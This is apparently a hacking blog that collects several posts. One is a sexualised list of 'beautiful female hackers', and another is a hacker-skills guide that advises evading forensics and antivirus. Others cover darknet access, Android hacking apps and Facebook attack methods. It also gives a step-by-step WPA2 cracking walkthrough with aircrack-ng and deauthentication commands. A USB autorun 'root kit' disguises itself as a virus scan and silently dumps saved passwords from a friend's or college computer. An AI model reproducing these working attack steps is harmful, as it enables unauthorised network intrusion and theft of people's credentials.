Friday, July 15, 2016

The World's Top 5 Most Beautiful Female Hacker

The World’s Top 5 Most Beautiful Female Hackers

Many people still think that beauty and intelligence are not getting along in the same person, but, hold on, this post will make you change your mind. As we all know that Hacking is a complicated aspect which really requires enormous technical skill. So, we created a list of some of the most beautiful female hackers, who won this place and reach several milestones in ethical hacking. You can find them in several blue-chip organizations, industrial setups, and big corporate houses.

1. Adeanna Cooke 


She is a former Playboy model nobody wants to mess with. Many friends of her tried to post her naked photos on the internet and also decided to take money for doing so. But she has her dignity intact and if anyone was going to be making money off her slamming body, it was going to be her . When she saw the photos of her face and body on some random unauthorised websites, she took the whole matter into her own hands and hacked into the account herself to take them down. WOW!

After getting success in her attempts, she started to help out other women in similar situations and hacked many websites. She sets the example for female hackers because she, like a lot of them, are something called “Hacktivists”.

 2. Xiao Tian

Xiao Tian

19 years old Xiao Tian is the new “general” of Chinese army of female hackers. Just at the end of her teenage, she became famous in forming the group “China Girl Security Team”, a group of hackers, especially for women, which is the largest in china currently, has more than 3000 members and counting. As Xiao Tian felt that there was no separate outlet for teenage girls like her in the male-ruled world of hacking.

 3. Anna Chapman

Anna Chapman

Anna Vasilyevna Chapman was arrested in New York. She was found with nine others under the charge of working for the Illegals Program spy ring under the Russian Federation’s external intelligence agency.
She became a celebrity right after her arrest by the FBI. Her hot pictures and videos went viral on the web. She earned a lot of media attention on 3 July 2013 when she asked Edward Snowden to marry her.

 4. Ying Cracker

Ying Cracker

Ying Cracker is one of the most beautiful hackers present in the world and a beautiful professor of Shanghai, China, who teaches people the basics of
How to start hacking
How to change your IP address
How to Wipe Office passwords etc.
Since she became popular in a Forum known as “Chinese Hottie Hackers” 
where she got a large fan base. Furthermore, her work is remarkable, being an expert in software for hacking, writing and profiting courses in these tools, and she also helps others to break (crack) software. But, the most interesting thing is that her achievements changed her surname to CRACKER.

5. Kristina Svechinskaya

Kristina

It looks like Russian hacker beauty is hard to handle so here is an another Russian hacker girl on our list. In 2010, Kristina and a few more friends of her broke into dozens of bank accounts using a trojan, including large banks like Bank of America and Bank of Wachovia. In total, Svechinskaya and her colleagues managed to steal more than $3 million. In this regard, the girl was charged with conspiracy to commit fraud, and the use of fake passports. Then Christine gave the right to be released on condition of bail of 25 thousand dollars
In addition, Christina has signed a recognizance not to leave. Three years later, on 24th June 2013, Svechinskaya was released under the supervision of the court in New York. She was ordered to pay damages of 35 thousand dollars.
After hacking scandal Svechinskaya stayed in America, where she graduated from New York University. She uses various social networks and enjoys very actively to communicate with her fans. And they have quite a lot of it: after the high-profile case of Svechinskaya, she got the title of the sexiest girl hacker.
                                  *source:techviral

Thursday, July 14, 2016

How to become a hacker ? The Essential Skills to Becoming a Master Hacker

How to Become a Hacker...here are Basic Skill to Becoming a Master Hacker..

hacker hacking become a hacker

Many of my aspiring hackers have written to me asking the same thing. "What skills do I need to be a good hacker?" As the hacker is among the most skilled information technology disciplines, it requires a wide knowledge of IT technologies and techniques. To truly be a great hacker, one must master many skills. Don't be discouraged if you don't have all the skills I list here, but rather use this list as a starting ground for what you need to study and master in the near future.




Broken the skills into three categories to help you go from one rung to the other more easily—fundamental, intermediate, and intangible skills


The Fundamental Skills

These are the basics that every hacker should know before even trying to hack. Once you have a good grasp on everything in this section, you can move into the intermediary level.

1 Basic Computer Skills

It probably goes without saying that to become a hacker you need some basic computer skills. These skills go beyond the ability to create a Word document or cruise the Internet. You need to be able to use the command line in Windows, edit the registry, and set up your networking parameters.
Many of these basic skills can be acquired in a basic computer skills course like A+.

2 Networking Skills

You need to understand the basics of networking, such as the following.
  • DHCP
  • NAT
  • Subnetting
  • IPv4
  • IPv6
  • Public v Private IP
  • DNS
  • Routers and switches
  • VLANs
  • OSI model
  • MAC addressing
  • ARP
As we are often exploiting these technologies, the better you understand how they work, the more successful you will be. Note that I did not write the two guides below, but they are very informative and cover some of the networking basics mentioned above.
  • Hacker Fundamentals: A Tale of Two Standards
  • The Everyman's Guide to How Network Packets Are Routed

3 Linux Skills

It is extremely critical to develop Linux skills to become a hacker. Nearly all the tools we use as a hacker are developed for Linux and Linux gives us capabilities that we don't have using Windows.
If you need to improve your Linux skills, or you're just getting started with Linux, check out my Linux series for beginners below.
  • Linux Basics for the Aspiring Hacker

4 Wireshark or Tcpdump

Wireshark is the most widely used sniffer/protocol analyzer, while tcpdump is a command line sniffer/protocol analyzer. Both can be extraordinarily useful in analyzing TCP/IP traffic and attacks.
  • An Intro to Wireshark and the OSI Model
  • Wireshark Filters for Wiretappers

5 Virtualization

You need to become proficient in using one of the virtualization software packages such as VirtualBox or VMWare Workstation. Ideally, you need a safe environment to practice your hacks before you take them out in real world. A virtual environment provides you a safe environment to test and refine your hacks before going live with them.

6 Security Concepts & Technologies

A good hacker understands security concepts and technologies. The only way to overcome the roadblocks established by the security admins is to be familiar with them. The hacker must understand such things as PKI (public key infrastructure), SSL (secure sockets layer), IDS (intrusion detection system), firewalls, etc.
The beginner hacker can acquire many of these skills in a basic security course such as Security+.
  • How to Read & Write Snort Rules to Evade an IDS

7 Wireless Technologies

In order to be able to hack wireless, you must first understand how it works. Things like the encryption algorithms (WEP, WPA, WPA2), the four-way handshake, and WPS. In addition, understanding such as things as the protocol for connection and authentication and the legal constraints on wireless technologies.
To get started, check out my guide below on getting started with wireless terms and technologies, then read our collection of Wi-Fi hacking guides for further information on each kind of encryption algorithms and for examples of how each hack works.
  • Getting Started with Wi-Fi Terms & Technologies
  • The Aspiring Hacker's Guide to Hacking Wi-Fi

The Intermediate Skills

This is where things get interesting, and where you really start to get a feel for your capabilities as a hacker. Knowing all of these will allow you to advance to more intuitive hacks where you are calling all the shots—not some other hacker.

8 Scripting

Without scripting skills, the hacker will be relegated to using other hackers' tools. This limits your effectiveness. Every day a new tool is in existence loses effectiveness as security admins come up with defenses.
To develop your own unique tools, you will need to become proficient at least in one of the scripting languages including the BASH shell. These should include one of Perl, Python, or Ruby.
  • Perl Scripting for the Aspiring Hacker
  • Scripting for the Aspiring Hacker, Part 1: BASH Basics
  • Scripting for the Aspiring Hacker, Part 2: Conditional Statements
  • Scripting for the Aspiring Hacker, Part 3: Windows PowerShell
  • The Ultimate List of Hacking Scripts for Metasploit's Meterpreter

9 Database Skills

If you want to be able to proficiently hack databases, you will need to understand databases and how they work. This includes the SQL language. I would also recommend the mastery of one of the major DBMS's such SQL Server, Oracle, or MySQL.
  • The Terms & Technologies You Need to Know Before Getting Started
  • Hunting for Microsoft's SQL Server
  • Cracking SQL Server Passwords & Owning the Server
  • Hacking MySQL Online Databases with Sqlmap
  • Extracting Data from Online Databases Using Sqlmap

10 Web Applications

Web applications are probably the most fertile ground for hackers in recent years. The more you understand about how web applications work and the databases behind them, the more successful you will be. In addition, you will likely need to build your own website for phishing and other nefarious purposes.
  • How to Clone Any Website Using HTTrack
  • How to Redirect Traffic to a Fake Website

11 Forensics

To become good hacker, you must not be caught! You can't become a pro hacker sitting in a prison cell for 5 years. The more you know about digital forensics, the better you can become at avoiding and evading detection.
  • Digital Forensics, Part 1: Tools & Techniques
  • Digital Forensics, Part 2: Network Forensics
  • Digital Forensics, Part 3: Recovering Deleted Files
  • Digital Forensics, Part 4: Evading Detection While DoSing

12 Advanced TCP/IP

The beginner hacker must understand TCP/IP basics, but to rise to the intermediate level, you must understand in intimate details the TCP/IP protocol stack and fields. These include how each of the fields (flags, window, df, tos, seq, ack, etc.) in both the TCP and IP packet can be manipulated and used against the victim system to enable MitM attacks, among other things.

13 Cryptography

Although one doesn't need to be a cryptographer to be a good hacker, the more you understand the strengths and weaknesses of each cryptographic algorithm, the better the chances of defeating it. In addition, cryptography can used by the hacker to hide their activities and evade detection.

14 Reverse Engineering

Reverse engineering enables you to open a piece of malware and re-build it with additional features and capabilities. Just like in software engineering, no one builds a new application from scratch. Nearly every new exploit or malware uses components from other existing malware.
In addition, reverse engineering enables the hacker to take an existing exploit and change its signature so that it can fly past IDS and AV detection.
  • How to Change Metasploit Payload Signatures to Evade AV Detection

The Intangible Skills

Along with all these computer skills, the successful hacker must have some intangible skills. These include the following.

15 Think Creatively

There is ALWAYS a way to hack a system and many ways to accomplish it. A good hacker can think creatively of multiple approaches to the same hack.
  • Null Byte's Guide to Social Engineering
  • CryptoLocker: An Innovative & Creative Hack

16 Problem-Solving Skills

A hacker is always coming up against seemingly unsolvable problems. This requires that the hacker be accustomed to thinking analytically and solving problems. This often demands that the hacker diagnose accurately what is wrong and then break the problem down into separate components. This is one of those abilities that comes with many hours of practice.
  • Problem Solving Is an Essential Hacker Skill

17 Persistence

A hacker must be persistent. If you fail at first, try again. If that fails, come up with a new approach and try again. It is only with a persistence that you will be able to hack the most secured systems.
  • So...You Want to Be a Hacker?
I hope this gives you some guidelines as to what one needs to study and master to ascend to the intermediate level of hacking. In a future article, I'll discuss what you need to master to ascend into the advanced or master hacker level, so keep coming back, my novice hackers!

                **source:wonder-how-to

Tuesday, July 12, 2016

What is Darknet or Deepnet?? here are some information about it..

What is Deepnet or Darknet??

about dark net dark web

A search, using a search engine like Google or Bing, generally returns some millions of pages for every keyword typed. You can try to estimate Internet’s size by thinking of how many websites would be there, if people are using ‘n’ number of keywords to search for information. This part of Internet is just what is visible. But there exists, within the countless websites, an Internet that is beyond the scope of search engines and general browsing. This is the Darknet, Deepnet, Deep Web, Invisible Web or Hidden Internet.

 The websites on Darknet are anonymous, i.e., you cannot tell who the website are, owners when visiting such Darknet websites. Websites in Darknet are sites that are using the Tor (The Onion Router) network. The basis of Tor network is to include so many nodes that the origin cannot trace where the data is going or where it is coming from

Normal browsers cannot open the Darknet websites whose top level domains are .onion because they are not normal domain names, but a string of random characters followed with .onion. These domain names are created by Onion when you host your anonymous websites using the Onion or Tor network.

How to access Darknet and Deepnet?


You will need two things to access the Darknet:
  1. A browser that can resolve .onion websites;
  2. A URL or directory that contains URLs to different websites or class of websites so that you know what to type in into the browsers’ address bar
To being with, the Onion Directory of Darknet is the safest bet. It has checked the URLs to see where they lead and has classified them accordingly. You can get to the Onion directory of Darknet at
 http://am4wuhz3zifexz5u.onion/.
Remember that you can open the link using TOR only. If you use ordinary browser, they cannot resolve the address, as .onion is not a real domain and the DNS servers would fail to retrieve its location

Who uses Darknet or Deepnet? Is it Dangerous?

 It could be as simple as a group of friends who do are discussing serious issues, or it could be something as dangerous as an assassin offering his services.
 There are whistle-blowers who let out information without the fear of getting caught – and there there are websites that show child porn.Most of the Darknet is misused by the criminal types. This is because it offers almost full anonymity.
 They are there to sell services such as pay-to-kill (assassin services), porn of all types, prostitutes, banned-drug sellers, weed-sellers etc. That is why Darknet is considered to be dangerous.And if anything goes wrong, the police would be knocking on your doors.


How to stay safe on Darknet or Deepnet?

There are some precautions I will list here to stay safe on the Darknet. Remember that while you are browsing the Darknet, police authorities too are browsing with an aim to figure out who is hosting websites and who all are using visiting criminal websites. Among the main things to keep in mind are:
  • Use TOR for anonymity (That’s a must);
  • Though TOR is already a little slow, as there are n number of nodes      to traverse, use a VPN for further anonymity;
  • Turn off running scripts in the TOR options (click the button just    before the address bar). This is because most of the sites in Darknet are criminal in nature. If you land on one, they might want to trace       you down. And scripts created using JavaScript can be dangerous if they manage to store something on your computer.
  • Think twice before you click any link from directory dumps as the links may or may not be what they are categorized as. The safest Darknet directory is the TOR Library so it is better to start from there.
  • DO NOT DOWNLOAD ANYTHING TO YOUR COMPUTER. No BitTorrents and no downloads as they may give away your actual IP when storing things to your computer. That could spell trouble.

Darknet Search Engines

Normal search engines cannot help you with retrieving website URLs for what you are seeking. You can use The Tor Search Engine called Torch or the Duck Duck Go’s .onion version to search for websites. Remember that these search results cannot be depended upon, as the websites’ description might show something that is way different than what the website actually is. You have to be careful in clicking the links.
The Duck Duck Go’s Darknet version is accessible using TOR at http://3g2upl4pq6kufc4m.onion. It will give you whatever you want. Again, links can be misleading so be careful before clicking your way into the deeper realms of Darknet.
The Tor Library, mentioned above, also has a list of search engines that can search within .onion domains to return results that could be of use to you. If you are new to the Darknet, the best way to get started is to use The Tor Library for browsing as the links there have been checked for inconsistency and will keep you off dangerous sites and dirty sites.



Few other links to get you started:
  • Onion.link
  • tor2web.org
  • vlib.org
  • icerocket.com
  • hss3uro2hsxfogfq.onion.to
  • lookahead.surfwax.com
  • DARPA Memex
  • freebase.com

           From wiki ebook or other webpage...

Sunday, July 10, 2016

How to crack a wpa2-psk encrypted wifi password using aircrack-ng


 To crack a wpa2-psk encrypted wifi password using aircrack-ng






Requirements:

 1.Linux system with aircrack-ng install
  <if not have aircrack-ng install command " sudo apt-get install aircrack-ng ">
2.Word list comprising of all the possible different combination of pass-phrases
<For the Wordlist Check here >

Working:

1) open your linux terminal as sudo or root and type:
   ifconfig  <this will show you all the networking interfaces connected to your device>
2) now to start monitor mode type
 airmon-ng start wlan0
           >>> 'airmon-ng' is a traffic monitoring tool
             ‘wlan0’ is your wireless interface 


**after this commend we started the monitor mode as it's seen the monitor mode is working under wlan0mon , so this is your card name for now in the red area a list of process id’s that cause trouble during the process so kill those processes by typing
 kill <pid>
<pid>= all id of connected device
now type ifconfig and this will show the newly set monitoring interface i.e,   
                  wlan0mon




3) to show list of available WiFi network type
 airodump-ng wlan0
select your target and note its ‘bssid’ (bssid = base service set identifier) and channel then stop the capture using “cntrl+c“.

4) Start capturing the packets of your target network
   
type the following command 
airodump-ng -c <channel> -w <name> --bssid <bssid> wlan0
    >>>i.e:  airodump-ng -c 2 -w wifi --bssid C0:4A:00:F0:F4:24 wlan0mon 

this will start the capturing of packets. and if you get the handshake you wont need the aireplay command...
if you don't get the handshake yet while the capturing of packets goes on, open a new terminal as root and type

aireplay-ng -0 0 -a <bssid> mon0
aireplay-ng = tool for deauthentication, fake authentication and other packet injections,
-0 = number associated for deauthentication,
0 = deauth count,
-a = bssid) here we are trying to send a deauthentication request.
In my case the command looks like

  aireplay-ng -0 0 -a C0:4A:00:F0:F4:24 wlan0
after few seconds stop it using cntrl+c.
now after we have successful captured the wpa handshake


5) Stop the capturing using cntrl+c and type “ls” that would bring up all the current directories and files.

Select the file with “.cap“extension and type the following command
aircrack-ng -w <full location of the word list> <name of the file>
**aircrack-ng is a tool that helps in cracking the password
In my case the command looks like


aircrack-ng -w /usr/share/wordlists/more_than_8.txt ********-01.cap
Now it starts finding suitable passphrase.

and now all you have to do is wait till you see the lovely news ( KEY Found 






Saturday, November 21, 2015

Here are top 10 popular hacking apps for Android smartphones and tablets ..

Hack using android phone?? Here are top 10 popular hacking apps for Android smartphones and tablets ..


top 10 hacking apk
Linux is regarded as the best operating system for ethical hacking and penetration testing. There are various hacking apps available for Android, as it is a Linux based operating system. If you want to test out vulnerabilities and find bugs, you need a solid hacking tool to back your research up.
Below is a list of Android hacking applications that will convert your Android device into a hacking machine.
AndroRAT
AndroRAT is a remote administration tool for Android devices. In other words, it is basically a client server application. The aim of the remote administration tool is to give control of the Android system remotely and retrieve information from it.
SpoofApp
(Phone call only) SpoofApp let’s you to place (spoof) calls with any caller ID number. You need SpoofCards to spoof calls, which are sold separately. It also includes some other features such as voice changer, which allows you to change your voice while using it. Additionally, it also allows you to record the whole conversation. You will receive a free 5 minute SpoofCard when you install the app for the first time.
Network Spoofer
Network Spoofer is another good app that allows you to change the website on other people’s computer from your Android phone. You need to download the Network Spoofer app and then log onto the Wi-Fi network. Choose a spoof to use with the app then tap on start. This app is considered as a malicious hacking tool by network administrators. So, it is advisable to not try this on unauthorized networks, as this is not a penetration testing app. It is just to exhibit how susceptible the home network is.
Faceniff
(Facebook only) Faceniff is basically used to sniff the Facebook ID over the same network. For instance, if you are on the same network and your Faceniff is turned on, then it will sniff all the Facebook IDs that are logged in from the same network. Since this is a paid version, you need to pay for this on the internet.
WhatsApp Sniffer
(For WhatsApp only) This tool can be used to hack private WhatsApp chats, pictures, audios and videos of your friends who are using your Wi-Fi Hotspot. Disable your antivirus before using this app, as it is detected by antivirus.
APK Inspector
The goal of this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code. APKInspector provides both analysis functions and graphic features for the users to gain deep insight into the malicious apps. You can also get the source code of any android application and edit it in order to remove credits and license.
dSploit
dSploit is a free penetration testing suite developed for the Android operating system, which comes with all-in-one network analysis capabilities. It can be used by anyone in order to perform a number of advanced network related tasks. It also contains a number of powerful functions that allow you to analyze, capture, and manipulate network transactions. You can scan networks for connected devices, identify the operating system, running services and open ports on each device, as well as check them for vulnerabilities. The app is designed to be very fast, handy and easy to use.
Wi-Fi Killer
This app allows you to block a person from using your Wi-Fi network. You can disable internet connection for any device that is present in your Wi-Fi network.
DroidSheep
DroidSheep is also one of the free best application for sniffing the sessions over the network. Similar to Faceniff, it not only sniffs the Facebook sessions but also other sessions.
Eviloperator
(Phone call only) This app connects two person automatically in a phone call, which makes them believe that they have called each other. The advantage of this app is that you can record and save the conversation.
Some of the apps given above may work only on rooted Android smartphones. We have given links for the App download, however download the app at your own risk. If you are not familiar with pentesting, theses apps will do you no good.

Tuesday, October 13, 2015

Here is How Lock and unlock your computer with a USB drive, secret-agent style With Predator,

Lock and unlock your computer with a USB drive, secret-agent style
With Predator,


You can turn your USB drive into a "key" that unlocks your computer when plugged in, and locks it when it's removed.
If you prevent access to your computer with just a password, you are missing out on an alternate (and more secure) way to lock down your computer.
Predator, a free Windows program, turns your USB drive into a key that locks your computer when it's removed. To unlock your computer, you'll have to plug the USB drive back in. (Talk about having secret-agent-style security.)
Anyone who attempts to access your computer without the USB flash drive will be hit with an epic "Access Denied" message. To get started.
Follow this guide:
Step 1: Download and install Predator(Google it).
Step 2: Once Predator launches, plug in your USB flash drive. None of the contents of the drive will be deleted or altered in any way, so feel free to use your primary thumbdrive.
When you insert the drive, a dialog box will appear asking you to create a password. Click OK to continue.
Step 3: In the Preferences window, take note of a few key settings. First, enter a secure, unique password in the "New password" field. If you lose your USB drive, you'll use it to unlock your computer.
If you'd like, you can check the Always Required box and you'll be asked to enter the password each time you use your thumbdrive to unlock your PC.
Finally, in the section under Flash Drives, ensure that the correct USB flash drive is selected. When you're done, click "Create key" and then OK.
Predator.
Step 4: Predator will exit. When it does, click the Predator icon in the taskbar to restart the program. A few seconds later, the icon will turn green, alerting you that Predator is running.
Every 30 seconds, Predator will check to see that your USB drive is plugged in. If it isn't, your computer will dim and lock down.
Here are some extra tips:
To pause Predator at any time select "Pause monitoring" from the taskbar menu.
If someone tried to access your PC while it was locked down, you'll see the activity log when you log back in. You can see the log at any time by clicking "View log" from the taskbar menu

Monday, October 12, 2015

HOW TO GET A SAVED PASSWORD FROM COMPUTER USING PEN DRIVES

HOW TO GET A SAVED PASSWORD FROM A VICTIM'S COMPUTER USING PEN DRIVES..


As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and an USB pen drive you can create your own root kit to capture
passwords from your friend’s college Computer.
We need the following tools to create our root kit:
MessenPass:
Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL
Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView:
Recovers the passwords of the following email programs: Outlook
Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook
2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape
Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, G-mail), if you use the associated programs of these accounts. IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView:
Recovers all passwords store  inside the Protected Storage, including the Auto Complete passwords of Internet Explorer, passwords of
Password-protected sites, MSN Explorer Passwords, and more…
PasswordFox:
Password Fox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name,
Password, User Name Field, Password Field, and the Signons file name.
Here is a step by step procedre to create the password toolkit:
NOTE: You must temporarily disable your antivirus before following these steps.
1:Download all the 5 tools, extract them and copy only the executables (.exe files)  into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2:Create a new Notepad and write the following text into it:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
3:save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB drive.
Now your root kit is ready and you are all set to capture the passwords. You can use this pendrive on your friend’s PC or on your college computer.
Just follow these steps
1:Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2:In the pop-up window, select the first option (Perform a Virus Scan).
Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
3:Remove the pendrive and you’ll see the stored passwords in the .TXT files
This works on Windows 2000, XP,Vista 7, Windows 8 ,Windows 8.1
and windows 10
NOTE: This procedure will only recover the stored passwords (if any) on the
Computer.This tutorial is only for educational purpose and do this at your own risk

Sunday, October 11, 2015

Here are some step to hack facebook account in 2016..

How to Hack Facebook Account 2016




Mostly Hackers use these methods to hack facebook:
facebook account 2016, So protect yourself from hackers. Must Read this post, and beware from hackers

1. Hack Facebook Account Password By ‪Phishing‬

Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a
fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims “Email Address” and “Password” is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials.

How to prevent:
  
Always check the page URL before logging in. This is the most trusted and effective way one can use to avoid himself from phishing.
Other way is to use some good Antivirus software which will warn you if you visit a harmful phishing page.
Even if somehow you have already entered your credentials in a phisher, Immediately Change your password.

2. Hack Facebook Account Password By ‪Keylogging‬

Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once is installed on victim’s computer, will
record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.

How to prevent :

Run the file only if you trust the sender.
Use good antivirus and update it regularly
 3. Social Engineering 
 

This method includes guessing and fooling the clients to give their own passwords. In this type of attack, a hacker sends a fake mail using most popular sites name.They convince that you have won billions of money and appeal for asking the user for user's password. Answering the security questions also lies under this category. It is not easy to convince someone to make him give his password.Guessing generally doesn't always work ( Although if you are lucky enough it may work!).


How to prevent:
 
Never give your password to anyone
Don’t believe in any sort of E-mails which asks for your password

4. Hack Facebook Account Password By ‪‎Session Hijacking‬

Session Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victims browser cookie which is used to authenticate the user on a website, and use it to access the victims
account. Session hijacking is widely used on LAN, and WiFi connections.

How to prevent:

Will not work if the user is using HTTPS ( Secured) connections

5. Trojan and Backdoor

This is an advanced level of hacking. It consists of a server and a client. In this type of attack the hacker sends the infected server to the victim. After execution the infected server i.e. Trojan on the victim’s PC opens a backdoor and now the hacker can control the  victim’s PC .

How to prevent:
  
Execute the file only if you trust the sende.
Use Best antivirus, therefore it detects Trojan horse virus too .

6. Sniffing

It consists of stealing session in progress. In this type of attack hacker makes connection with server and client and relays message between them, making them believe that they are talking to each other directly.Hackers choose many ways. 
Some drawbacks of this type of hacking is If user is logged out then attacker is also logged out and the session is lost.
It is difficult to sniff on SSL protected networks.

How to prevent:

Always use SSL secured connections.
Always keep a look at the url if the http:// is not changed to https:// it means that sniffing is active on your network.
Mostly hackers use these methods to hack facebook account password, We are shared this ways/post only for security purpose. We get numerous emails on a daily basis asking us to how to Hack friends Facebook or E-mail account If your email falls into any of the above categories we will not help you.